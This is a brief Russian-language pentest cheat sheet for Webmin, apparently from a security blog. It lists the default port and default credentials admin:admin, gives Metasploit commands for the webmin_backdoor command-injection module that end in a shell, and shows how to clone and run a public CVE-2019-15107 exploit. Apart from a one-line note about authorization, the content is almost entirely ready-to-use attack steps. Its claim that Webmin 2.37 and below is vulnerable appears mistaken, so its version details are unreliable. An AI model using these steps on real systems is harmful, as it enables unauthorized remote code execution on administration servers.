Webmin — это веб-интерфейс для системного администрирования Unix. Хотя он предлагает удобный способ управления системами, Webmin также может быть мишенью для хакеров. В статье рассмотрим пентест Webmin для выявления и устранения уязвимостей.
Еще по теме: ICMP-туннелирование при пентесте
Пентест Webmin
Webmin — это веб-инструмент системного администрирования для Unix.
По умолчанию используется порт:
1 |
10000 |
Следует помнить, что пентест должен проводиться ответственно и только с разрешения владельца системы.
Учетные данные по умолчанию:
1 |
admin:admin |
password_chagne.cgi Command Injection version=1.890
1 2 3 4 5 6 |
msfconsole msf> use exploit/linux/http/webmin_backdoor msf> set rhosts msf> set lhost msf> run shell |
Удаленное выполнение кода (RCE) версии < 2.37
Webmin версии 2.37 и ниже уязвимы для удаленного выполнения кода.
Загрузите полезную нагрузку:
1 2 3 |
git clone https://github.com/MuirlandOracle/CVE-2019-15107 cd CVE-2019-15107 python3 CVE-2019-15107.py |
В заключение, пентест Webmin — это важный процесс, который помогает выявить и исправить уязвимости в системе.
ПОЛЕЗНЫЕ ССЫЛКИ:
- Пентест и атака на протоколы HSRP и VRRP
- Использование Netcat в пентесте на Kali Linux
- Организация GUI в пентесте при постэксплуатации Windows